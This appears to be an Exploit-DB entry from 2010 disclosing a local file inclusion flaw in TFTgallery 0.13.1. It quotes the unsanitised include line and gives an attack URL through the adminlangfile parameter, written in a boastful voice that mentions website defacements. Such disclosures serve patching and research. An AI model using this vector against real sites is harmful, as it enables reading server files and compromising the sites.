TFTgallery 0.13.1 - Local File Inclusion

EDB-ID:

15345

CVE:



Author:

Havok

Type:

webapps


Platform:

PHP

Date:

2010-10-28


# TFTgallery <= 0.13.1 Local File Inclusion (LFI)
# 28/10/2010
# PHP script available on SourceForge. TFTgallery 0.13 : http://prdownloads.sourceforge.net/tftgallery/tftgallery-0.13.zip
#                                      TFTgallery 0.13.1 patch : http://www.tftgallery.org/versions/tftgallery-0.13-to-0.13.1.zip
# By Havok, from France.
# KAS-D10 à tous les leets. Hey lamers, i hope that it will help you to notify another stupid defacement on Zone-H. Cheers mates!
# Enj0y!
# Wanna contact me? h4v0k1337<at>gmail<dot>com
# 
## register_globals=On (Who said "what a useless vulnerability!" =()

"include_once "language/" . $adminlangfile;" (@thumbnailformpost.inc.php (line 3) for the win ;)).

http://www.IM-G0ING-T0-G3T-HACK3D.COM/TFTP-GALLERY-PATH/admin/thumbnailformpost.inc.php?adminlangfile=[LFI]

Maybe some other vulnerabilities, too lazy to check at the moment, sorry =).

<END>